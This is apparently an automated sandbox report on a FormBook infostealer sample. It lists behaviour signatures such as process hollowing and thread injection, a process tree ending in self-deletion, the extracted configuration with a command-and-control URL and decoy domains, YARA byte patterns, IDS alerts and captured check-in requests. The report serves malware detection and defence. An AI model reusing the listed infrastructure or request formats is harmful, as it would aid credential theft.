
Windows Analysis Report NQBNpLezqZKv1P4.exe

Overview

General Information

Sample Name: NQBNpLezqZKv1P4.exe
Analysis ID: 452473
MD5: f03bf8d3ecc2ae4b40f836c59ac09bdf
SHA1: 58f48a5a960eac4ee1f33ea16075cfd44f37b3a3
SHA256: 2e4cf88a434d484057fcc090cb7de5deb6d30c8e00da339c886f2482f6a7ebe1
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • NQBNpLezqZKv1P4.exe (PID: 6940 cmdline: 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe' MD5: F03BF8D3ECC2AE4B40F836C59AC09BDF)
    • NQBNpLezqZKv1P4.exe (PID: 3984 cmdline: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe MD5: F03BF8D3ECC2AE4B40F836C59AC09BDF)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 7056 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 7012 cmdline: /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extraclass.xyz/4nn8/"], "decoy": ["chamtowon.com", "yaaquu.com", "thepettybox.com", "zrcezzfdfkyjlir.com", "finalcutgrowshop.com", "856381151.xyz", "fbgroupsmadesimple.com", "thinktank-texas.com", "shoppingsys.com", "natezubal.com", "skyhighbud.com", "toddlely.net", "bachelor-boys.com", "blogdepr.com", "chuanyigou.com", "photocouture-show.com", "spacetasks.com", "kureitall.com", "qmcp00033.com", "visiodaya.com", "teleasistencianamaste.com", "updates-app.com", "marbleheadelementary.com", "jameswilliamgordon.com", "bouncingbellybeans.com", "icloud-site-fd.com", "hotradioarnhem.com", "shengdagp.com", "sickrime.com", "17545bullock.com", "cmovied.com", "wwwpaturnoiketollbyplate.com", "qphis.com", "vhsstores.com", "sorcierebienaimee.com", "y7mioung.xyz", "indianapartylines.com", "fezze.info", "uweup.com", "xn--gestinvalenciana-9ub.com", "creativeartaadda.com", "cattedralidismeraldo.com", "thecarestudio.com", "etruruueurt.xyz", "sidehustle.kiwi", "hagumee.com", "sdkqglgs.com", "nirvananaturalcbd.net", "grassth.com", "zeugmagiftandmore.com", "smartscene.club", "chsecv.com", "gettothecoast.com", "whiskey-friends.com", "ambernai.com", "iregentos.info", "sh-zzjy.com", "boicity.com", "sgtcsleathers.net", "themixedveggies.com", "greenbanc.net", "papiempanadas.com", "ndirxk.club", "iafzal.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | (none listed)
0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | strings:
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | (none listed)
0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | (none listed)
4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | strings:
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | (none listed)
4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | strings:
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.extraclass.xyz/4nn8/"], "decoy": ["chamtowon.com", "yaaquu.com", "thepettybox.com", "zrcezzfdfkyjlir.com", "finalcutgrowshop.com", "856381151.xyz", "fbgroupsmadesimple.com", "thinktank-texas.com", "shoppingsys.com", "natezubal.com", "skyhighbud.com", "toddlely.net", "bachelor-boys.com", "blogdepr.com", "chuanyigou.com", "photocouture-show.com", "spacetasks.com", "kureitall.com", "qmcp00033.com", "visiodaya.com", "teleasistencianamaste.com", "updates-app.com", "marbleheadelementary.com", "jameswilliamgordon.com", "bouncingbellybeans.com", "icloud-site-fd.com", "hotradioarnhem.com", "shengdagp.com", "sickrime.com", "17545bullock.com", "cmovied.com", "wwwpaturnoiketollbyplate.com", "qphis.com", "vhsstores.com", "sorcierebienaimee.com", "y7mioung.xyz", "indianapartylines.com", "fezze.info", "uweup.com", "xn--gestinvalenciana-9ub.com", "creativeartaadda.com", "cattedralidismeraldo.com", "thecarestudio.com", "etruruueurt.xyz", "sidehustle.kiwi", "hagumee.com", "sdkqglgs.com", "nirvananaturalcbd.net", "grassth.com", "zeugmagiftandmore.com", "smartscene.club", "chsecv.com", "gettothecoast.com", "whiskey-friends.com", "ambernai.com", "iregentos.info", "sh-zzjy.com", "boicity.com", "sgtcsleathers.net", "themixedveggies.com", "greenbanc.net", "papiempanadas.com", "ndirxk.club", "iafzal.com"]}
Yara detected FormBook
Source: Yara match | File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: NQBNpLezqZKv1P4.exe | Joe Sandbox ML: detected
Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: NQBNpLezqZKv1P4.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: NQBNpLezqZKv1P4.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL | source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb | source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP | source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE
Source: Binary string: wscui.pdb | source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.extraclass.xyz/4nn8/
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected: GET /4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo HTTP/1.1 Host: www.boicity.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo HTTP/1.1 Host: www.sh-zzjy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo HTTP/1.1 Host: www.zrcezzfdfkyjlir.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo HTTP/1.1 Host: www.iafzal.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo HTTP/1.1 Host: www.nirvananaturalcbd.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo HTTP/1.1 Host: www.updates-app.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo HTTP/1.1 Host: www.fbgroupsmadesimple.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 184.168.131.241 184.168.131.241
Source: Joe Sandbox View | ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: unknown | DNS traffic detected: queries for: www.boicity.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 11:15:39 GMT Server: Apache Set-Cookie: is_mobile=0; path=/; domain=www.zrcezzfdfkyjlir.com Vary: X-W-SSL,User-Agent Set-Cookie: language=en; expires=Thu, 05-Aug-2021 11:15:39 GMT; Max-Age=1209600; path=/ Cache-Control: private X-Host: pages3.sf2p.intern.weebly.net X-UA-Compatible: IE=edge,chrome=1 Content-Length: 3802 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 32 36 34 35 31 37 34 35 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65
Source: NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmp | String found in binary or memory: http://050005.voodoo.com/js/partner.js
Source: NQBNpLezqZKv1P4.exe | String found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com(
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.comp
Source: NQBNpLezqZKv1P4.exe | String found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
Source: explorer.exe, 00000005.00000000.702532502.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comR
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641810889.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comTC
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comen
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.como.
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comroa
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.645535031.000000000555E000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640649210.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/ct
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnAc
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnUc
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.krklJ
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.krylx
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639209828.0000000005542000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.coml
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr.kr
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr8l
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.krbl
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comicFf
